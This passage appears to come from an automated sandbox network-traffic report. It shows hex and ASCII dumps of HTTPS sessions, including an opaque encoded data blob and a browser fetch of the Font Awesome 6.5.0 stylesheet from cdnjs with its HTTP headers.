                                                                            2024-10-28 08:36:42 UTC1369INData Raw: 33 39 6a 58 6e 42 30 39 6c 53 62 67 31 6a 44 4d 65 4b 73 46 34 41 48 48 73 32 36 76 4a 43 5a 55 4c 57 30 66 52 78 43 4b 6f 78 72 63 39 55 75 75 73 78 77 69 74 46 63 4a 61 58 68 68 6a 72 35 33 32 46 4c 42 4b 59 5c 2f 5a 53 6f 31 6f 4e 55 47 61 66 53 52 55 44 6f 62 31 74 4f 4b 6d 44 51 70 50 56 61 34 67 50 42 74 59 42 69 31 33 58 4c 41 4b 6b 5a 64 31 68 4a 6c 6e 43 49 2b 55 4e 6e 48 32 4e 48 65 79 33 36 49 6e 45 68 6f 39 50 44 68 2b 48 75 50 72 4a 7a 71 72 4a 6c 72 78 5c 2f 5c 2f 6a 50 56 75 77 68 6b 53 4c 31 50 58 47 63 73 48 6b 46 42 6b 72 43 65 35 4e 78 68 39 6a 75 5a 44 35 6a 49 75 34 68 53 33 39 7a 53 68 62 42 5c 2f 6b 45 52 65 5c 2f 45 4b 49 5a 49 44 4a 6a 73 44 48 56 67 6a 67 4d 64 37 4d 56 33 6a 39 35 58 69 47 32 58 48 48 42 33 59 50 51 50 36 77 62
                                                                            Data Ascii: 39jXnB09lSbg1jDMeKsF4AHHs26vJCZULW0fRxCKoxrc9UuusxwitFcJaXhhjr532FLBKY\/ZSo1oNUGafSRUDob1tOKmDQpPVa4gPBtYBi13XLAKkZd1hJlnCI+UNnH2NHey36InEho9PDh+HuPrJzqrJlrx\/\/jPVuwhkSL1PXGcsHkFBkrCe5Nxh9juZD5jIu4hS39zShbB\/kERe\/EKIZIDJjsDHVgjgMd7MV3j95XiG2XHHB3YPQP6wb
                                                                            2024-10-28 08:36:42 UTC1369INData Raw: 67 4d 69 75 7a 75 73 4b 35 57 34 5c 2f 6a 31 47 72 35 49 73 79 79 45 79 41 30 56 55 6c 2b 30 58 6b 38 68 73 76 79 6e 57 68 36 47 31 4f 77 6c 32 4f 42 58 70 42 34 72 37 51 56 31 6f 7a 72 46 72 53 74 4c 71 4b 73 67 49 6e 79 43 64 5a 71 33 50 44 74 6f 42 6d 5c 2f 71 54 73 59 76 43 6f 4f 76 32 49 7a 52 4f 62 73 54 46 71 50 6d 55 30 66 46 77 73 38 6b 49 75 6d 71 5c 2f 43 52 70 68 55 46 6c 66 71 43 4d 49 56 68 62 41 39 58 79 77 54 6d 4b 4b 47 6c 67 39 6d 36 73 47 31 6d 68 44 62 5c 2f 64 32 50 64 39 65 56 76 6d 72 62 50 52 73 50 30 65 57 78 42 70 45 64 79 76 5a 78 4d 69 42 47 6a 4e 6a 70 2b 59 35 4a 43 65 45 7a 4f 57 78 4b 52 66 55 54 35 69 37 50 7a 77 33 59 68 6f 31 77 47 57 6d 76 6d 30 56 47 65 4a 44 6d 45 42 53 73 77 35 53 78 49 45 61 50 6f 44 58 53 70 59 54
                                                                            Data Ascii: gMiuzusK5W4\/j1Gr5IsyyEyA0VUl+0Xk8hsvynWh6G1Owl2OBXpB4r7QV1ozrFrStLqKsgInyCdZq3PDtoBm\/qTsYvCoOv2IzRObsTFqPmU0fFws8kIumq\/CRphUFlfqCMIVhbA9XywTmKKGlg9m6sG1mhDb\/d2Pd9eVvmrbPRsP0eWxBpEdyvZxMiBGjNjp+Y5JCeEzOWxKRfUT5i7Pzw3Yho1wGWmvm0VGeJDmEBSsw5SxIEaPoDXSpYT
                                                                            2024-10-28 08:36:42 UTC1369INData Raw: 69 64 38 74 55 53 32 78 66 69 6e 50 33 45 44 7a 37 69 53 48 39 57 68 45 54 4e 47 5c 2f 57 36 56 72 63 56 6a 66 6b 47 70 43 68 2b 4e 61 4d 46 54 75 7a 55 57 38 79 66 38 6d 67 50 68 53 5a 51 69 30 72 67 44 37 6c 53 67 66 64 31 5a 43 48 5c 2f 6a 4b 33 4e 4c 41 6b 4c 75 35 63 4a 74 69 46 5a 52 4f 4a 59 6c 55 46 2b 52 67 4a 57 51 30 79 49 65 4a 54 58 63 64 75 35 61 70 67 76 6b 48 55 64 52 49 79 59 6d 30 59 36 5a 74 48 59 68 4b 59 59 35 34 49 69 64 54 31 69 55 6b 71 46 49 5a 78 68 66 6b 70 34 56 69 49 58 66 53 77 67 70 48 6a 36 39 63 67 6a 4b 31 2b 55 45 4e 41 6e 7a 79 69 57 75 68 41 6d 49 65 6e 74 62 34 67 51 48 76 36 6c 50 53 68 31 54 41 30 35 4a 31 64 4a 4f 2b 68 72 74 34 6b 76 6b 65 5c 2f 57 33 4c 7a 66 79 54 54 57 62 41 6c 53 63 73 4b 5c 2f 75 67 6c 69 5c
                                                                            Data Ascii: id8tUS2xfinP3EDz7iSH9WhETNG\/W6VrcVjfkGpCh+NaMFTuzUW8yf8mgPhSZQi0rgD7lSgfd1ZCH\/jK3NLAkLu5cJtiFZROJYlUF+RgJWQ0yIeJTXcdu5apgvkHUdRIyYm0Y6ZtHYhKYY54IidT1iUkqFIZxhfkp4ViIXfSwgpHj69cgjK1+UENAnzyiWuhAmIentb4gQHv6lPSh1TA05J1dJO+hrt4kvke\/W3LzfyTTWbAlScsK\/ugli\
                                                                            2024-10-28 08:36:42 UTC1369INData Raw: 51 66 35 5c 2f 31 66 68 50 5a 34 33 65 4a 68 62 4f 4e 48 71 77 72 4d 47 4c 39 48 59 5a 31 6a 73 5c 2f 46 41 32 45 6e 6e 4b 5a 48 73 38 35 64 63 67 56 71 42 4c 42 56 41 4b 71 4d 68 34 32 33 50 42 6a 30 35 44 71 4e 57 2b 7a 50 74 6a 37 64 34 73 51 58 2b 39 6f 41 36 46 6f 64 5a 45 72 67 67 6f 38 72 36 6e 32 34 75 33 6b 70 75 49 56 65 36 67 61 5c 2f 6a 6c 46 41 6c 7a 31 79 64 5a 72 51 37 56 35 6b 77 49 35 68 39 77 33 6d 58 33 71 67 43 49 50 56 48 6c 62 69 45 78 6f 50 78 78 6a 6d 37 62 49 76 49 4b 59 6e 4f 44 30 4f 55 55 39 74 4e 31 7a 6b 4e 74 43 2b 39 43 6e 79 64 44 68 67 36 5a 34 38 4f 49 76 72 41 35 68 59 5c 2f 70 4f 44 4d 51 2b 37 77 41 44 67 62 77 45 47 43 4b 6f 51 6f 63 53 4f 79 44 6c 58 34 44 33 4e 71 42 5a 57 48 65 78 6d 32 78 32 4a 63 70 2b 55 46 39
                                                                            Data Ascii: Qf5\/1fhPZ43eJhbONHqwrMGL9HYZ1js\/FA2EnnKZHs85dcgVqBLBVAKqMh423PBj05DqNW+zPtj7d4sQX+9oA6FodZErggo8r6n24u3kpuIVe6ga\/jlFAlz1ydZrQ7V5kwI5h9w3mX3qgCIPVHlbiExoPxxjm7bIvIKYnOD0OUU9tN1zkNtC+9CnydDhg6Z48OIvrA5hY\/pODMQ+7wADgbwEGCKoQocSOyDlX4D3NqBZWHexm2x2Jcp+UF9
                                                                            2024-10-28 08:36:42 UTC1369INData Raw: 58 64 55 33 48 6d 31 4f 76 50 4d 48 2b 6b 74 56 58 42 6e 78 45 61 77 58 52 6f 37 45 48 5c 2f 32 62 7a 48 57 35 44 6a 48 68 63 71 69 6d 59 66 36 72 6b 50 4f 69 70 6d 42 66 6d 58 52 79 68 31 76 4b 59 56 5a 6d 71 71 6f 44 67 64 61 52 6a 50 72 33 4a 45 43 50 79 4e 44 4b 6e 37 59 44 61 6d 35 44 76 47 47 43 37 4f 68 4a 4f 46 5c 2f 65 58 44 79 69 4a 48 35 48 67 36 64 4a 48 39 59 49 68 66 31 66 35 4d 63 50 72 53 57 47 51 62 71 6a 43 30 51 47 57 54 6d 78 39 6a 7a 49 6b 41 69 2b 65 59 63 51 6e 58 42 36 6d 57 4d 70 65 51 42 6f 57 72 66 78 37 49 37 50 42 30 65 2b 4d 63 6d 39 56 6b 73 2b 31 6f 35 53 53 64 5a 50 67 4a 54 49 77 53 68 74 69 6b 79 4b 30 46 75 6b 75 6e 39 4a 78 4a 75 5c 2f 39 67 54 31 76 46 39 68 6c 6c 49 4b 41 5c 2f 31 58 42 58 56 74 73 4e 7a 50 54 4e 72
                                                                            Data Ascii: XdU3Hm1OvPMH+ktVXBnxEawXRo7EH\/2bzHW5DjHhcqimYf6rkPOipmBfmXRyh1vKYVZmqqoDgdaRjPr3JECPyNDKn7YDam5DvGGC7OhJOF\/eXDyiJH5Hg6dJH9YIhf1f5McPrSWGQbqjC0QGWTmx9jzIkAi+eYcQnXB6mWMpeQBoWrfx7I7PB0e+Mcm9Vks+1o5SSdZPgJTIwShtikyK0Fukun9JxJu\/9gT1vF9hllIKA\/1XBXVtsNzPTNr
                                                                            2024-10-28 08:36:42 UTC1369INData Raw: 65 4b 63 48 50 72 31 5c 2f 5c 2f 54 66 64 58 41 35 70 4a 77 52 78 76 31 76 65 4d 69 39 36 65 39 4a 33 2b 7a 43 38 36 42 6c 62 4b 54 66 70 43 4d 79 2b 54 78 6d 30 46 4a 61 66 62 35 41 34 5a 61 39 49 59 33 73 31 48 44 49 70 61 46 62 6c 64 65 39 6f 69 55 79 5a 47 37 62 6f 70 76 38 49 4d 68 44 35 2b 73 6b 74 58 77 55 54 54 37 52 5c 2f 6b 56 69 75 67 64 50 6b 37 45 63 4f 6d 54 4a 4d 52 44 6f 53 53 6b 74 51 56 4e 77 47 78 64 7a 71 70 48 78 4f 31 59 45 6d 49 57 69 39 6e 6c 66 43 4b 52 41 37 42 49 62 2b 4f 78 2b 57 68 70 68 34 76 6e 6f 43 49 50 53 5a 37 38 67 49 32 44 5a 43 61 76 51 69 44 59 48 6b 33 6f 74 42 47 6b 30 57 61 31 6a 2b 46 71 47 69 75 69 62 76 6e 57 64 4b 52 63 7a 56 78 46 61 61 72 6d 56 39 67 2b 37 39 7a 48 2b 66 6b 63 32 67 51 7a 67 39 77 4d 71 68
                                                                            Data Ascii: eKcHPr1\/\/TfdXA5pJwRxv1veMi96e9J3+zC86BlbKTfpCMy+Txm0FJafb5A4Za9IY3s1HDIpaFblde9oiUyZG7bopv8IMhD5+sktXwUTT7R\/kViugdPk7EcOmTJMRDoSSktQVNwGxdzqpHxO1YEmIWi9nlfCKRA7BIb+Ox+Whph4vnoCIPSZ78gI2DZCavQiDYHk3otBGk0Wa1j+FqGiuibvnWdKRczVxFaarmV9g+79zH+fkc2gQzg9wMqh
                                                                            2024-10-28 08:36:42 UTC1228INData Raw: 50 49 57 65 37 32 4f 57 59 45 4b 62 5c 2f 59 46 62 63 79 72 72 52 30 79 62 64 4b 42 33 38 79 41 61 39 4c 4a 77 63 47 43 37 70 49 64 42 66 39 51 53 72 45 43 41 30 61 63 59 36 79 38 70 36 65 46 7a 6d 48 46 41 77 47 36 31 76 41 71 56 53 5c 2f 6a 53 4e 30 57 73 5c 2f 4b 4e 52 43 76 44 6c 6b 48 31 49 74 6e 43 2b 37 4f 44 65 59 78 4d 4b 6e 45 39 50 37 78 6d 73 70 61 2b 72 67 6e 31 43 4d 47 43 75 4e 64 5a 76 50 68 6b 32 6a 39 39 53 30 39 74 72 62 58 6d 78 46 79 6f 38 6b 38 70 41 56 64 58 55 42 63 36 6a 41 50 75 38 34 50 6b 35 45 33 7a 51 4f 61 71 33 49 74 55 49 2b 62 39 65 7a 55 75 63 38 55 75 4d 55 75 78 33 76 53 30 75 72 63 75 63 55 48 36 71 52 46 72 30 70 33 35 46 65 46 42 30 4d 79 33 47 39 4c 79 6f 4f 4f 37 35 30 75 6b 59 51 74 76 42 78 6c 43 75 77 76 52 54
                                                                            Data Ascii: PIWe72OWYEKb\/YFbcyrrR0ybdKB38yAa9LJwcGC7pIdBf9QSrECA0acY6y8p6eFzmHFAwG61vAqVS\/jSN0Ws\/KNRCvDlkH1ItnC+7ODeYxMKnE9P7xmspa+rgn1CMGCuNdZvPhk2j99S09trbXmxFyo8k8pAVdXUBc6jAPu84Pk5E3zQOaq3ItUI+b9ezUuc8UuMUux3vS0urcucUH6qRFr0p35FeFB0My3G9LyoOO750ukYQtvBxlCuwvRT
                                                                            2024-10-28 08:36:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.449778104.17.25.144431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:43 UTC577OUTGET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1
                                                                            Host: cdnjs.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: text/css,*/*;q=0.1
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: style
                                                                            Referer: https://alinefrasca.sbs/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:43 UTC946INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:43 GMT
                                                                            Content-Type: text/css; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: public, max-age=30672000
                                                                            ETag: W/"656632a7-54f3"
                                                                            Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                            cf-cdnjs-via: cfworker/kv
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Timing-Allow-Origin: *
                                                                            X-Content-Type-Options: nosniff
                                                                            CF-Cache-Status: HIT
                                                                            Age: 392362
                                                                            Expires: Sat, 18 Oct 2025 08:36:43 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nPxHTp7gX4thafCnRz39eNT65Jz7khnq%2BE%2FZKNBuAs3GlkDPJ9PbZiyd3M2D8gL7VnSG9OVyIfX%2BjIUB5c05ypoNcW9JStw9LXUMscs4mGFewzW6Tt2%2FwJ6npwrLZvcMYyC2AxNl"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                            Strict-Transport-Security: max-age=15780000
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d99998d8fb36c5b-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:43 UTC423INData Raw: 33 39 38 39 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 35 2e 30 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 33 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                                            Data Ascii: 3989/*! * Font Awesome Free 6.5.0 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2023 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                                            2024-10-28 08:36:43 UTC1369INData Raw: 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 63 6c 61 73 73 69 63 2c 2e 66 61 2d 72 65 67 75 6c 61 72 2c 2e 66 61 2d 73 6f 6c 69 64 2c 2e 66 61 72 2c 2e 66 61 73 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 46 72 65 65 22 7d 2e 66 61 2d 62 72 61 6e 64 73 2c 2e 66 61 62 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a
                                                                            Data Ascii: le;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:
                                                                            2024-10-28 08:36:43 UTC1369INData Raw: 6c 6c 2d 6c 65 66 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 70 75 6c 6c 2d 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                                                                            Data Ascii: ll-left{float:left;margin-right:var(--fa-pull-margin,.3em)}.fa-pull-right{float:right;margin-left:var(--fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0s);animation-dela
                                                                            2024-10-28 08:36:43 UTC1369INData Raw: 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61
                                                                            Data Ascii: ion-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1));animation-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:va
                                                                            2024-10-28 08:36:43 UTC1369INData Raw: 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f
                                                                            Data Ascii: -animation-delay,0s);animation-delay:var(--fa-animation-delay,0s);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animatio
                                                                            2024-10-28 08:36:43 UTC1369INData Raw: 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69
                                                                            Data Ascii: var(--fa-animation-duration,2s);animation-duration:var(--fa-animation-duration,2s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timi
                                                                            2024-10-28 08:36:43 UTC1369INData Raw: 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74
                                                                            Data Ascii: tion-duration:0s;transition-duration:0s}}@-webkit-keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-t
                                                                            2024-10-28 08:36:43 UTC1369INData Raw: 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73
                                                                            Data Ascii: ;transform:scale(1) translateY(0)}to{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}}@keyframes fa-bounce{0%{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-s
                                                                            2024-10-28 08:36:43 UTC1369INData Raw: 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69
                                                                            Data Ascii: -fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opaci
                                                                            2024-10-28 08:36:43 UTC1369INData Raw: 6d 3a 72 6f 74 61 74 65 28 2d 31 32 64 65 67 29 7d 33 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 7d 34 30 25 2c 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 68 61 6b 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b
